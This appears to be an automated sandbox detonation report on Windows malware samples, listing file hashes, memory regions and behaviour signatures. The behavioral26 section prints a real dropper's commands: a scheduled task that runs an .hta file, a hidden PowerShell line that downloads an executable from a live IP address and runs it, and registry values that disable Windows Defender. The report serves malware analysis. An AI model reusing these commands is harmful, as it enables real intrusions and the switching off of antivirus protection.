SHA256 89b8f00fe73464c8c23c4ac125eea5132dcb59790f88c9f2b6cc2bbb8da9ee0d
SHA512 5972bfd0c78f523a1f4556eb4a174581e2f75ebf3107695f8f56fa844859e7a9a8d5be73b3b31144ae9810d10a908afb4592ad803c1e9ed5cbf18ccccbc32661

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\AlternateServices.bin

MD5 9367c425d4413fb194cc17c2e8cfa55a
SHA1 c51bec1c2d54dc0663192fb114c316a9e1123145
SHA256 f07a9f0159b31c52b13db6a9e4262219bec798531b3dbd279b135b02c7d742c8
SHA512 aa5a2ec17d63ab779c9cb9a81dc05c3586b3e606761fae11c8c9d3ad1146b3fa825847cdbce3031e87949fcfa19a98f9990a9ebc1cb924848a91edcd9e62d93d

memory/197036-1173-0x0000000000270000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.bin

MD5 905eb7fa5f4e255d9cfe05ed0d525a0a
SHA1 6911b9d2b25236ce5703bfa4fbe806888d10605a
SHA256 ff05ea0a84457916296a692090b5f548c4f71c720a5307e9f39fd43c39a523a3
SHA512 edf946ec3450196735288d5f7a43e26a35171ac34cf9b65db02e48def1d1d78006c348ea0edb1059ebe3df447a146c4ac017826ac02ec0ead5af7434504a3a56

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.tmp

MD5 d0189c86d2d58de33cf282b8de2d26a9
SHA1 e5bac149f0214541716e08ef25ae7673036072c9
SHA256 0d3892e6a35698ae89c03be360eb58e8ca89e79ba47467f9ea590619b3ca0b1e
SHA512 c39d9a546cdb14722e1a5f1bcbc5fdf2ddc0e5d57a7ada39a7583c13275dbcad90717c16e505c0b34952e67b1073b18ac235f99a616501bb04be3f90d3ef855f

memory/197036-1073-0x0000000000270000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\929bd9d6-09d9-4b86-bb92-6bfc294d8f29

MD5 54a55a2fc4d066ff6155c7f339894653
SHA1 dccbc4c9a9bf3782c5b6ba4e0d6f55d638fcb0c0
SHA256 2b20262bb626975f8ff9c1bb64a456d8600e7a121912153078c3e94fd5d57e07
SHA512 e69fbef6d25fde9bf7eadeba56dee686508c0c2422f67dd657bb844169c076c5ccdef99fe968b69469d6db73cdecf6321fc65c3ddcb5c14a64a3686083073410

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.tmp

MD5 d99319b8a448f26e6263ba9fef7b3214
SHA1 2d89af980ae5c736c3b2599df2bdbea2f589f1fe
SHA256 6dfc4472233fa35222a2fa154f4419d9a0fef7bd290bca9128d48da6ed65e3d1
SHA512 9dd3b255addbafe585441a0c066083da0eab0eaff2429359b74755d0a88fcb1bb09cb6aad3f70614bd249aee22aadd044aca43d4e7092fb9626701073459c93a

memory/145836-614-0x0000000000270000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\400728a6-acbc-4eaf-9147-cb4bf1e9f280

MD5 b462ee123f50042f22bc092d8bbcdedf
SHA1 322de16078732337e87c5c358717ff00e266bfdf
SHA256 083191dfcebc1136654337b6087f2ab85a860dde20f3557b2e9058410ab97c31
SHA512 1daf59bd573a695da9a7889f87d94342eb2bb912686dd5da206ee54b4cee21771eae5cff4831f71baf8b7c951292b9cc6bc9f8c3d7ea3985c64afb563987b4cb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.bin

MD5 8a49a407c2b61451bdd56a0ba11a1e43
SHA1 e17f2666ca48a661e4edc56896d894dcb89e8618
SHA256 52dcfe3d7293113bf2efa80153135b3f8120a29daf73588444b474215bf87060
SHA512 07ab3689dd6b7eb565c275dd883c983c465c4c5351000d09bb4d328f886a881afe7d71baab2e4e17efc92b5a903d1633475e6fd6cd01c06adab34f66f1c77fd6

C:\Users\Admin\AppData\Local\Temp\10036510101\a68f071a5f.exe

MD5 e551ee3c02e04a54815f4a7425823acb
SHA1 0c737ab4bc14a7ba1865937339e0d2a9a214b9e1
SHA256 81227bc4b3aaa4ca09473f192bff56186c3f89e11899ca6ea1289412fa90b657
SHA512 090708de73e923f443436b44ff27158d02381552bc952c4a2d06fbd441ba9134dcf1418aa403918632c233e466df8a39b67203ee378d2cb686cb3bde9c5c937a

memory/213508-1274-0x0000000000FA0000-0x00000000013F4000-memory.dmp

memory/213508-1273-0x0000000000FA0000-0x00000000013F4000-memory.dmp

memory/213508-1267-0x0000000000FA0000-0x00000000013F4000-memory.dmp

memory/160076-1275-0x0000000000400000-0x000000000087F000-memory.dmp

memory/145836-1277-0x0000000000270000-0x000000000074E000-memory.dmp

memory/198316-1279-0x0000000000400000-0x000000000087F000-memory.dmp

memory/198316-1278-0x0000000000400000-0x000000000087F000-memory.dmp

memory/213508-1287-0x0000000075870000-0x0000000075AF4000-memory.dmp

memory/213508-1288-0x0000000000FA0000-0x00000000013F4000-memory.dmp

memory/213508-1291-0x0000000000FA0000-0x00000000013F4000-memory.dmp

memory/160076-1292-0x0000000000400000-0x000000000087F000-memory.dmp

memory/3920-1293-0x0000000081910000-0x0000000081A15000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.bin

MD5 0351250f666cc216c5ac3f81a1233ea8
SHA1 915dfbf1b7dfafa5031a83eb2553ecec152f2622
SHA256 ff1829f19b04afd7e85ebff1d5e964ea26a920aaa4b5e81124d3475f0b00488b
SHA512 45dad332a6d06d24e0b541d9d6455e320181740ebf2e2809e538b14797a11e494fb14b49453ed8502699127c4bd0674a5058b701a50faaf26bd87987f6e6d79e

memory/145836-1320-0x0000000000270000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs-1.js

MD5 c95708a76cf10548c9967a5832840174
SHA1 24ea99bbd2af770fc3e6f77d107ddc20d7e65a36
SHA256 1994942f49bbaa4bcd166d943effed49761fe095775aaf0d5447376038959bcf
SHA512 3669f63455b38ffaffbe8937c46ad53b8ea2a24d10922b4e802cb936d4c0f43e941b54aa5d5a365e4ce269bf30203b82e408e38a925b781ee5c02fe55fcaff6a

memory/198316-1335-0x0000000000400000-0x000000000087F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2psyjw2x.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 d29a06318217f7c664a8912ea7c70a9b
SHA1 88a40e984c676a56fcb2eaa8db279f69390d6cce
SHA256 230a751d038f492054d303390f27e5b8c3f4afd0a2961ab62d316de1428a2a66
SHA512 3d291964fc014aee9ca433d48394104ae30086ae2b6edea3f3983f898883303c91a1604dbef465cf620de7732ec0a19c927f75eb40c64783f4832986d7cd5db7

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

memory/160076-1626-0x0000000000400000-0x000000000087F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036560101\a436e04ae1.exe

MD5 f9ff1782c634319b0faf726e9910f592
SHA1 bcd481deb29fde172fe9631f79a386da9a9067db
SHA256 fe80c165e1a9aa7009013df5372b491bf5612564b327cfa7ca5b2df987da172c
SHA512 1446c9db289ae66bc176dc8f0d19920798bebc6949a773ba9ec4b879fe1eb6d45f16a2de9366e44c981ab1701ac83b2a0bcc9352f9d594d861324b33ef8b85d1

memory/6432-1785-0x0000000000B40000-0x0000000001571000-memory.dmp

memory/145836-2085-0x0000000000270000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs-1.js

MD5 dd8ab4daeca19af3048bf8dc012acdaf
SHA1 84340c31209458928b0df62703e6376078bd96b0
SHA256 b9fb9dfdff87b434e0bb65b0e1d4fe2aee1496e50672932215b5ff4ae2791876
SHA512 ed4ac62b8b3090a7db894b067bee9d1fe9bb39d9418bab16e7101b3d84121e5387d07d63390218db1bae373d97c72dcc391ca05a070aeeb012cc9e2768ff2abf

Analysis: behavioral26

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

Signatures

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3416 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 3416 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 3416 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe C:\Windows\SysWOW64\mshta.exe
PID 2088 wrote to memory of 3836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2088 wrote to memory of 3836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2088 wrote to memory of 3836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4664 wrote to memory of 1636 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4664 wrote to memory of 1636 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4664 wrote to memory of 1636 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 3956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE
PID 1636 wrote to memory of 3956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE
PID 1636 wrote to memory of 3956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\random.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn m8rnJmaSDYN /tr "mshta C:\Users\Admin\AppData\Local\Temp\z9ag2CxxB.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\z9ag2CxxB.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn m8rnJmaSDYN /tr "mshta C:\Users\Admin\AppData\Local\Temp\z9ag2CxxB.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'Z0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE

"C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\z9ag2CxxB.hta

MD5 44603a17e88571be0341a88cf5b93739
SHA1 7d2e4ce90d0e511daafd865911e5c1d022445d03
SHA256 0e180f61817e84789dd2e3489926cf0089e6d206166cf360790417c4c0b3430e
SHA512 23b68fc617e4f0b0bca41642964b456fa71357d38cf05b399d6010169e185ad680ac44b2b913d09ba8f9da14ad101bc9be77b83e03fe89f46371b31adde0f185

memory/1636-2-0x0000000003250000-0x0000000003286000-memory.dmp

memory/1636-3-0x0000000005B00000-0x0000000006128000-memory.dmp

memory/1636-4-0x0000000005960000-0x0000000005982000-memory.dmp

memory/1636-6-0x0000000006210000-0x0000000006276000-memory.dmp

memory/1636-5-0x0000000006130000-0x0000000006196000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mifqjibe.xue.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1636-16-0x0000000006280000-0x00000000065D4000-memory.dmp

memory/1636-17-0x0000000006810000-0x000000000682E000-memory.dmp

memory/1636-18-0x0000000006860000-0x00000000068AC000-memory.dmp

memory/1636-19-0x0000000007F50000-0x00000000085CA000-memory.dmp

memory/1636-20-0x0000000006D40000-0x0000000006D5A000-memory.dmp

memory/1636-22-0x0000000007CF0000-0x0000000007D86000-memory.dmp

memory/1636-23-0x0000000007C80000-0x0000000007CA2000-memory.dmp

memory/1636-24-0x0000000008B80000-0x0000000009124000-memory.dmp

C:\Users\Admin\AppData\Local\TempZ0BKADDPIDETYJS4LMMEBROYPPGJFSWC.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/3956-35-0x0000000000190000-0x00000000005E2000-memory.dmp

memory/3956-38-0x0000000000190000-0x00000000005E2000-memory.dmp

memory/3956-39-0x0000000000190000-0x00000000005E2000-memory.dmp

memory/3956-41-0x0000000000190000-0x00000000005E2000-memory.dmp

memory/3956-44-0x0000000000190000-0x00000000005E2000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"

Network

N/A

Files

memory/2296-0-0x000000013F250000-0x000000013F3FE000-memory.dmp